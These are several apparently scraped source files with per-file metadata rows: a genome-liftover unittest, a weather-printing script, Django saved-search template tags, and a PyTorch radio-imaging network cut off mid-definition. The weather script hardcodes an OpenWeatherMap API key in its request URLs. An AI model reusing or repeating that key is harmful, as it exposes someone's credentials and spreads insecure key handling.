| 0
| 0
| 0.127936
| 0.045242
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016416
| false
| 0.008208
| 0.005472
| 0.005472
| 0.038304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
627c9ad78030e4fa27721b044ee4518226e6cb90
| 8,526
|
py
|
Python
|
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
'''
Created on 16/06/2020
@author: mmp
'''
import unittest, os
from PHASEfilter.lib.utils.util import Utils
from PHASEfilter.lib.utils.reference import Reference
from PHASEfilter.lib.utils.lift_over_simple import LiftOverLight
from PHASEfilter.lib.process.process_references import ProcessTwoReferences
from PHASEfilter.lib.utils.software import Software
class Test(unittest.TestCase):
def test_sync(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = False
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
self.assertEqual(Software.SOFTWARE_minimap2_name, lift_over_ligth.get_best_algorithm(seq_name_a, seq_name_b))
### test positions
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
utils.remove_file(temp_file)
temp_out = utils.get_temp_file("out_sync_saccharo", ".txt")
process_two_references = ProcessTwoReferences(seq_file_name_a, seq_file_name_b, temp_out)
process_two_references.process()
out_result_expected = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/out_sync_saccharo.txt')
temp_diff = utils.get_temp_file("diff_file", ".txt")
cmd = "diff {} {} > {}".format(temp_out, out_result_expected, temp_diff)
os.system(cmd)
vect_result = utils.read_text_file(temp_diff)
self.assertEqual(0, len(vect_result))
utils.remove_file(temp_out)
def test_sync_2(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = True
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position, position+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 49610, 49611, temp_file))
utils.remove_file(temp_file)
def test_sync_3(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = False
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
### impose lastz best alignment
lift_over_ligth.dt_chain_best_method[seq_name_a + "_" + seq_name_b] = Software.SOFTWARE_lastz_name
self.assertEqual(Software.SOFTWARE_lastz_name, lift_over_ligth.get_best_algorithm(seq_name_a, seq_name_b))
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position, position+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 49610, 49611, temp_file))
utils.remove_file(temp_file)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.test_to_remove']
unittest.main()
| 49.859649
| 129
| 0.7924
| 1,403
| 8,526
| 4.33856
| 0.079116
| 0.087399
| 0.068342
| 0.078199
| 0.847544
| 0.843765
| 0.841137
| 0.84048
| 0.84048
| 0.84048
| 0
| 0.03763
| 0.099226
| 8,526
| 171
| 130
| 49.859649
| 0.754948
| 0.02205
| 0
| 0.796875
| 0
| 0
| 0.053511
| 0.032828
| 0
| 0
| 0
| 0
| 0.296875
| 1
| 0.023438
| false
| 0
| 0.046875
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6569a6e340724c91abd951ef2f5a99f54b9d871b
| 1,628
|
py
|
Python
|
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
import requests
url = "http://api.openweathermap.org/data/2.5/weather?q=croix&appid=1b980eb95427e4049b7e9fdd2819958b""&units=metric"
weather_data = requests.get(url).json()
ville = weather_data['name']
print("Météo à %s" % (ville))
print(weather_data['main']['temp'], "°C")
print(weather_data['main']['humidity'],"%")
print(weather_data['main']['pressure'],"HPA")
print(weather_data['clouds']['all'],'nuage')
print(weather_data['weather'][0]['description'])
print("il fait %s" % (weather_data['weather'][0]['description']))
##Lille
url = "http://api.openweathermap.org/data/2.5/weather?q=Lille&appid=1b980eb95427e4049b7e9fdd2819958b""&units=metric"
weather_data = requests.get(url).json()
ville = weather_data['name']
print("Météo à %s" % (ville))
print(weather_data['main']['temp'], "°C")
print(weather_data['main']['humidity'],"%")
print(weather_data['main']['pressure'],"HPA")
print(weather_data['clouds']['all'],'nuage')
print(weather_data['weather'][0]['description'])
print("il fait %s" % (weather_data['weather'][0]['description']))
##calais
url = "http://api.openweathermap.org/data/2.5/weather?q=calais&appid=1b980eb95427e4049b7e9fdd2819958b""&units=metric"
weather_data = requests.get(url).json()
ville = weather_data['name']
print("Météo à %s" % (ville))
print(weather_data['main']['temp'], "°C")
print(weather_data['main']['humidity'],"%")
print(weather_data['main']['pressure'],"HPA")
print(weather_data['clouds']['all'],'nuage')
print(weather_data['weather'][0]['description'])
print("il fait %s" % (weather_data['weather'][0]['description']))
#####
| 32.56
| 118
| 0.677518
| 211
| 1,628
| 5.127962
| 0.194313
| 0.243993
| 0.221811
| 0.166359
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0.962107
| 0
| 0.052561
| 0.088452
| 1,628
| 49
| 119
| 33.22449
| 0.674528
| 0.006757
| 0
| 0.870968
| 0
| 0.096774
| 0.420681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.032258
| 0.677419
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
659105fd900dabc31b7d9e0f22c0134db43d6353
| 4,100
|
py
|
Python
|
saved_searches/templatetags/saved_searches_tags.py
|
django-haystack/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | 13
|
2015-04-03T22:29:43.000Z
|
2021-09-27T11:53:08.000Z
|
saved_searches/templatetags/saved_searches_tags.py
|
toastdriven/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | null | null | null |
saved_searches/templatetags/saved_searches_tags.py
|
toastdriven/saved_searches
|
a2674f83c18d1053d724d879c67e882162328a4b
|
[
"BSD-3-Clause"
] | 11
|
2015-02-23T20:32:07.000Z
|
2020-05-02T16:26:23.000Z
|
from django import template
from saved_searches.models import SavedSearch
register = template.Library()
class MostRecentNode(template.Node):
def __init__(self, varname, user=None, search_key=None, limit=10):
self.varname = varname
self.user = user
self.search_key = search_key
self.limit = int(limit)
def render(self, context):
user = None
search_key = None
if self.user is not None:
temp_user = template.Variable(self.user)
user = temp_user.resolve(context)
if self.search_key is not None:
temp_search_key = template.Variable(self.search_key)
search_key = temp_search_key.resolve(context)
context[self.varname] = SavedSearch.objects.most_recent(user=user, search_key=search_key)[:self.limit]
return ''
@register.tag
def most_recent_searches(parser, token):
"""
Returns the most recent queries seen. By default, returns the top 10.
Usage::
{% most_recent_searches as <varname> [for_user user] [for_search_key search_key] [limit n] %}
Example::
{% most_recent_searches as recent %}
{% most_recent_searches as recent for_user request.user %}
{% most_recent_searches as recent for_search_key "general" %}
{% most_recent_searches as recent limit 5 %}
{% most_recent_searches as recent for_user request.user for_search_key "general" limit 15 %}
"""
bits = token.split_contents()
tagname = bits[0]
bits = bits[1:]
if len(bits) < 2:
raise template.TemplateSyntaxError("%r tag requires at least two arguments." % tagname)
varname = bits[1]
bits = iter(bits[2:])
user = None
search_key = None
limit = 10
for bit in bits:
if bit == 'for_user':
user = bits.next()
if bit == 'for_search_key':
search_key = bits.next()
if bit == 'limit':
limit = bits.next()
return MostRecentNode(varname, user, search_key, limit)
class MostPopularNode(template.Node):
def __init__(self, varname, user=None, search_key=None, limit=10):
self.varname = varname
self.user = user
self.search_key = search_key
self.limit = int(limit)
def render(self, context):
user = None
search_key = None
if self.user is not None:
temp_user = template.Variable(self.user)
user = temp_user.resolve(context)
if self.search_key is not None:
temp_search_key = template.Variable(self.search_key)
search_key = temp_search_key.resolve(context)
context[self.varname] = SavedSearch.objects.most_popular(user=user, search_key=search_key)[:self.limit]
return ''
@register.tag
def most_popular_searches(parser, token):
"""
Returns the most popular queries seen. By default, returns the top 10.
Usage::
{% most_popular_searches as <varname> [for_user user] [for_search_key search_key] [limit n] %}
Example::
{% most_popular_searches as popular %}
{% most_popular_searches as popular for_user request.user %}
{% most_popular_searches as popular for_search_key "general" %}
{% most_popular_searches as popular limit 5 %}
{% most_popular_searches as popular for_user request.user for_search_key "general" limit 15 %}
"""
bits = token.split_contents()
tagname = bits[0]
bits = bits[1:]
if len(bits) < 2:
raise template.TemplateSyntaxError("%r tag requires at least two arguments." % tagname)
varname = bits[1]
bits = iter(bits[2:])
user = None
search_key = None
limit = 10
for bit in bits:
if bit == 'for_user':
user = bits.next()
if bit == 'for_search_key':
search_key = bits.next()
if bit == 'limit':
limit = bits.next()
return MostPopularNode(varname, user, search_key, limit)
| 30.597015
| 111
| 0.61561
| 509
| 4,100
| 4.756385
| 0.151277
| 0.141264
| 0.061958
| 0.074349
| 0.909542
| 0.834366
| 0.782321
| 0.782321
| 0.782321
| 0.722842
| 0
| 0.009599
| 0.288537
| 4,100
| 133
| 112
| 30.827068
| 0.820363
| 0.249512
| 0
| 0.857143
| 0
| 0
| 0.044746
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0.025974
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65cce303cdb7ac0a4b1a47b8e1977de59c33754f
| 21,554
|
py
|
Python
|
radionets/dl_framework/architectures/filter_deep.py
|
Kevin2/radionets
|
44e10a85a096f5cea8e9d83f96db65bdd4df9517
|
[
"MIT"
] | 9
|
2021-06-17T10:12:28.000Z
|
2022-03-23T23:04:19.000Z
|
radionets/dl_framework/architectures/filter_deep.py
|
radionets-project/radionets
|
9b87ddbf704e78db55944e70071a7002f6213399
|
[
"MIT"
] | 24
|
2021-02-12T13:57:11.000Z
|
2022-03-03T08:00:31.000Z
|
radionets/dl_framework/architectures/filter_deep.py
|
Kevin2/radionets
|
44e10a85a096f5cea8e9d83f96db65bdd4df9517
|
[
"MIT"
] | 3
|
2020-01-08T09:01:09.000Z
|
2020-10-19T18:53:13.000Z
|
from torch import nn
import torch
from radionets.dl_framework.model import (
Lambda,
LocallyConnected2d,
symmetry,
GeneralELU,
conv_phase,
conv_amp,
)
from functools import partial
from math import pi
from radionets.dl_framework.utils import round_odd, make_padding
class filter_deep_amp(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_amp = nn.Sequential(*conv_amp(1, 4, (23, 23), 1, 11, 1))
self.conv2_amp = nn.Sequential(*conv_amp(4, 8, (21, 21), 1, 10, 1))
self.conv3_amp = nn.Sequential(*conv_amp(8, 12, (17, 17), 1, 8, 1))
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv4_amp = nn.Sequential(*conv_amp(1, 4, (5, 5), 1, 4, 2))
self.conv5_amp = nn.Sequential(*conv_amp(4, 8, (5, 5), 1, 2, 1))
self.conv6_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv7_amp = nn.Sequential(*conv_amp(12, 16, (3, 3), 1, 1, 1))
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv8_amp = nn.Sequential(*conv_amp(1, 4, (3, 3), 1, 1, 1))
self.conv9_amp = nn.Sequential(*conv_amp(4, 8, (3, 3), 1, 1, 1))
self.conv10_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.symmetry_real = Lambda(symmetry)
def forward(self, x):
x = x[:, 0].unsqueeze(1)
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
amp = self.conv1_amp(amp)
amp = self.conv2_amp(amp)
amp = self.conv3_amp(amp)
amp = self.conv_con1_amp(amp)
# Second block
amp = self.conv4_amp(amp)
amp = self.conv5_amp(amp)
amp = self.conv6_amp(amp)
amp = self.conv7_amp(amp)
amp = self.conv_con2_amp(amp)
# Third block
amp = self.conv8_amp(amp)
amp = self.conv9_amp(amp)
amp = self.conv10_amp(amp)
amp = self.conv_con3_amp(amp)
# inp_amp = inp[:, 0].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
# x0[inp_amp != 0] = inp_amp[inp_amp != 0]
return x0
class filter_deep_phase(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_phase = nn.Sequential(
*conv_phase(1, 4, (23, 23), 1, 11, 1, add=-2.1415)
)
self.conv2_phase = nn.Sequential(
*conv_phase(4, 8, (21, 21), 1, 10, 1, add=-2.1415)
)
self.conv3_phase = nn.Sequential(
*conv_phase(8, 12, (17, 17), 1, 8, 1, add=-2.1415)
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.conv4_phase = nn.Sequential(
*conv_phase(1, 4, (5, 5), 1, 3, 2, add=-2.1415)
)
self.conv5_phase = nn.Sequential(
*conv_phase(4, 8, (5, 5), 1, 2, 1, add=-2.1415)
)
self.conv6_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 3, 2, add=-2.1415)
)
self.conv7_phase = nn.Sequential(
*conv_phase(12, 16, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.conv8_phase = nn.Sequential(
*conv_phase(1, 4, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv9_phase = nn.Sequential(
*conv_phase(4, 8, (3, 3), 1, 1, 1, add=-2.1415)
)
self.conv10_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=-2.1415)
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(-2.1415),
)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
phase = x[:, 1, :].unsqueeze(1)
# First block
phase = self.conv1_phase(phase)
phase = self.conv2_phase(phase)
phase = self.conv3_phase(phase)
phase = self.conv_con1_phase(phase)
# Second block
phase = self.conv4_phase(phase)
phase = self.conv5_phase(phase)
phase = self.conv6_phase(phase)
phase = self.conv7_phase(phase)
phase = self.conv_con2_phase(phase)
# Third block
phase = self.conv8_phase(phase)
phase = self.conv9_phase(phase)
phase = self.conv10_phase(phase)
phase = self.conv_con3_phase(phase)
# inp_phase = inp[:, 1].unsqueeze(1)
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
# x1[inp_phase != 0] = inp_phase[inp_phase != 0]
return x1
class filter_deep(nn.Module):
def __init__(self, img_size):
super().__init__()
self.conv1_amp = nn.Sequential(*conv_amp(1, 4, (23, 23), 1, 11, 1))
self.conv1_phase = nn.Sequential(
*conv_phase(1, 4, (23, 23), 1, 11, 1, add=1 - pi)
)
self.conv2_amp = nn.Sequential(*conv_amp(4, 8, (21, 21), 1, 10, 1))
self.conv2_phase = nn.Sequential(
*conv_phase(4, 8, (21, 21), 1, 10, 1, add=1 - pi)
)
self.conv3_amp = nn.Sequential(*conv_amp(8, 12, (17, 17), 1, 8, 1))
self.conv3_phase = nn.Sequential(
*conv_phase(8, 12, (17, 17), 1, 8, 1, add=1 - pi)
)
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.conv4_amp = nn.Sequential(*conv_amp(1, 4, (5, 5), 1, 4, 2))
self.conv4_phase = nn.Sequential(*conv_phase(1, 4, (5, 5), 1, 4, 2, add=1 - pi))
self.conv5_amp = nn.Sequential(*conv_amp(4, 8, (5, 5), 1, 2, 1))
self.conv5_phase = nn.Sequential(*conv_phase(4, 8, (5, 5), 1, 2, 1, add=1 - pi))
self.conv6_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv6_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=1 - pi)
)
self.conv7_amp = nn.Sequential(*conv_amp(12, 16, (3, 3), 1, 1, 1))
self.conv7_phase = nn.Sequential(
*conv_phase(12, 16, (3, 3), 1, 1, 1, add=1 - pi)
)
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.conv8_amp = nn.Sequential(*conv_amp(1, 4, (3, 3), 1, 1, 1))
self.conv8_phase = nn.Sequential(*conv_phase(1, 4, (3, 3), 1, 1, 1, add=1 - pi))
self.conv9_amp = nn.Sequential(*conv_amp(4, 8, (3, 3), 1, 1, 1))
self.conv9_phase = nn.Sequential(*conv_phase(4, 8, (3, 3), 1, 1, 1, add=1 - pi))
self.conv10_amp = nn.Sequential(*conv_amp(8, 12, (3, 3), 1, 2, 2))
self.conv10_phase = nn.Sequential(
*conv_phase(8, 12, (3, 3), 1, 2, 2, add=1 - pi)
)
self.conv11_amp = nn.Sequential(*conv_amp(12, 20, (3, 3), 1, 1, 1))
self.conv11_phase = nn.Sequential(
*conv_phase(12, 20, (3, 3), 1, 1, 1, add=1 - pi)
)
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.symmetry_real = Lambda(symmetry)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
phase = x[:, 1, :].unsqueeze(1)
# First block
amp = self.conv1_amp(amp)
phase = self.conv1_phase(phase)
amp = self.conv2_amp(amp)
phase = self.conv2_phase(phase)
amp = self.conv3_amp(amp)
phase = self.conv3_phase(phase)
amp = self.conv_con1_amp(amp)
phase = self.conv_con1_phase(phase)
# Second block
amp = self.conv4_amp(amp)
phase = self.conv4_phase(phase)
amp = self.conv5_amp(amp)
phase = self.conv5_phase(phase)
amp = self.conv6_amp(amp)
phase = self.conv6_phase(phase)
amp = self.conv7_amp(amp)
phase = self.conv7_phase(phase)
amp = self.conv_con2_amp(amp)
phase = self.conv_con2_phase(phase)
# Third block
amp = self.conv8_amp(amp)
phase = self.conv8_phase(phase)
amp = self.conv9_amp(amp)
phase = self.conv9_phase(phase)
amp = self.conv10_amp(amp)
phase = self.conv10_phase(phase)
amp = self.conv11_amp(amp)
phase = self.conv11_phase(phase)
amp = self.conv_con3_amp(amp)
phase = self.conv_con3_phase(phase)
# amp = amp + inp[:, 0].unsqueeze(1)
inp_amp = inp[:, 0].unsqueeze(1)
inp_phase = inp[:, 1].unsqueeze(1)
# phase = phase + inp[:, 1].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
x0[inp_amp != 0] = inp_amp[inp_amp != 0]
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
x1[inp_phase != 0] = inp_phase[inp_phase != 0]
comb = torch.cat([x0, x1], dim=1)
return comb
class filter_deep_variable(nn.Module):
def __init__(self, img_size):
super().__init__()
# ########################## Phase 1
self.conv1_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.365 * img_size), round_odd(0.365 * img_size)),
stride=1,
padding=make_padding(round_odd(0.365 * img_size), 1, 1),
dilation=1,
)
)
self.conv1_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.365 * img_size), round_odd(0.365 * img_size)),
stride=1,
padding=make_padding(round_odd(0.365 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv2_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.333 * img_size), round_odd(0.333 * img_size)),
stride=1,
padding=make_padding(round_odd(0.333 * img_size), 1, 1),
dilation=1,
)
)
self.conv2_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.333 * img_size), round_odd(0.333 * img_size)),
stride=1,
padding=make_padding(round_odd(0.333 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv3_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.269 * img_size), round_odd(0.269 * img_size)),
stride=1,
padding=make_padding(round_odd(0.269 * img_size), 1, 1),
dilation=1,
)
)
self.conv3_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.269 * img_size), round_odd(0.269 * img_size)),
stride=1,
padding=make_padding(round_odd(0.269 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con1_amp = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con1_phase = nn.Sequential(
LocallyConnected2d(12, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
# #################################### Phase 2
self.conv4_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 2),
dilation=2,
)
)
self.conv4_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 2),
dilation=2,
